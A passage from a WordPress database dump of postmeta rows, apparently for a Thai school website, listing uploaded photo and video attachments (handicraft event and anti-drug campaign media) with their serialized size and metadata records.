"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:337489;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:65:\"LINE_ALBUM_วันสุนทรภู่_250626_2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24041;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5008,1800,'_edit_lock','1752030248:1'),
(5009,1801,'_wp_attached_file','2025/07/เดินรณรงค์ต่อต้านยาเสพติด-รร.หนองปลาเข็ง-กอไหล่.mp4'),
(5010,1801,'_wp_attachment_metadata','a:11:{s:7:\"bitrate\";i:1748170;s:8:\"filesize\";i:30635107;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:133;s:16:\"length_formatted\";s:4:\"2:13\";s:5:\"width\";i:720;s:6:\"height\";i:540;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:9:{s:10:\"dataformat\";s:3:\"mp4\";s:7:\"bitrate\";i:96000;s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:44100;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";s:17:\"compression_ratio\";d:0.06802721088435375;}s:17:\"created_timestamp\";i:1750997044;}'),
(5011,1802,'_wp_attached_file','2025/07/Screenshot-2025-07-09-095350.png'),
(5012,1802,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1191;s:6:\"height\";i:670;s:4:\"file\";s:40:\"2025/07/Screenshot-2025-07-09-095350.png\";s:8:\"filesize\";i:1239294;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"Screenshot-2025-07-09-095350-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:116832;}s:5:\"large\";a:5:{s:4:\"file\";s:41:\"Screenshot-2025-07-09-095350-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:907733;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2025-07-09-095350-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:54107;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:40:\"Screenshot-2025-07-09-095350-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:571352;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2025-07-09-095350-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:154244;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5014,1800,'_thumbnail_id','1802'),
(5015,1800,'_edit_last','1'),
(5016,1800,'title_style','default'),
(5017,1800,'_title_style','field_5d1a0217cf408'),
(5018,1800,'related',''),
(5019,1800,'_related','field_603b51c3e183e'),
(5020,1803,'title_style','default'),
(5021,1803,'_title_style','field_5d1a0217cf408'),
(5022,1803,'related',''),
(5023,1803,'_related','field_603b51c3e183e'),
(5024,1800,'enclosure','http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/เดินรณรงค์ต่อต้านยาเสพติด-รร.หนองปลาเข็ง-กอไหล่.mp4\n30635107\nvideo/mp4\n'),
(5025,1804,'_edit_lock','1752031114:1'),
(5026,1805,'_wp_attached_file','2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_3.jpg'),
(5027,1805,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:68:\"2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_3.jpg\";s:8:\"filesize\";i:430003;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_3-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23587;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_3-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:167833;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9588;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_3-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106655;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_3-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24826;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5028,1806,'_wp_attached_file','2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_5.jpg'),
(5029,1806,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:68:\"2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_5.jpg\";s:8:\"filesize\";i:370311;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_5-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20998;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_5-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145681;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8071;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_5-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93122;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_5-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21914;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5030,1807,'_wp_attached_file','2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_1.jpg'),
(5031,1807,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:68:\"2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_1.jpg\";s:8:\"filesize\";i:419326;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23958;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:166514;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9349;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106612;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23559;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5032,1808,'_wp_attached_file','2025/07/S__9871454_0.jpg'),
(5033,1808,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871454_0.jpg\";s:8:\"filesize\";i:370167;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871454_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23382;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871454_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145186;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871454_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9536;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871454_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96303;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871454_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23052;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5034,1809,'_wp_attached_file','2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_4.jpg'),
(5035,1809,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:68:\"2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_4.jpg\";s:8:\"filesize\";i:362421;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_4-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19508;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_4-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140591;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7085;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_4-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88888;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_4-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20341;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5036,1810,'_wp_attached_file','2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_2.jpg'),
(5037,1810,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:68:\"2025/07/LINE_ALBUM_ศิลปหัตถกรรม_250709_2.jpg\";s:8:\"filesize\";i:354467;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_2-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19361;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_2-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:138170;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7141;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_2-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87290;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_ศิลปหัตถกรรม_250709_2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20556;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5038,1811,'_wp_attached_file','2025/07/S__9871447_0.jpg'),
(5039,1811,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871447_0.jpg\";s:8:\"filesize\";i:362079;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871447_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22717;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871447_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141899;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871447_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9523;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871447_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93642;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871447_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23670;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5040,1812,'_wp_attached_file','2025/07/S__9871445_0.jpg'),
(5041,1812,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871445_0.jpg\";s:8:\"filesize\";i:394496;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871445_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22696;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871445_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151134;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871445_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9228;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871445_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98416;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871445_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23855;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5042,1813,'_wp_attached_file','2025/07/S__9871448_0.jpg'),
(5043,1813,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871448_0.jpg\";s:8:\"filesize\";i:362079;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871448_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22717;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871448_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141899;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871448_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9523;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871448_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93642;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871448_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23670;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5044,1814,'_wp_attached_file','2025/07/S__9871449_0.jpg'),
(5045,1814,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:24:\"2025/07/S__9871449_0.jpg\";s:8:\"filesize\";i:358595;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871449_0-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19234;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871449_0-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137603;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871449_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7545;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__9871449_0-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137603;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871449_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18839;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5046,1815,'_wp_attached_file','2025/07/S__9871450_0.jpg'),
(5047,1815,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:24:\"2025/07/S__9871450_0.jpg\";s:8:\"filesize\";i:358595;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871450_0-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19234;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871450_0-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137603;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871450_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7545;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__9871450_0-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137603;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871450_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18839;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5048,1816,'_wp_attached_file','2025/07/S__9871455_0.jpg'),
(5049,1816,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/07/S__9871455_0.jpg\";s:8:\"filesize\";i:375272;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__9871455_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24737;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__9871455_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:150225;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871455_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10277;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__9871455_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99950;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__9871455_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24057;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\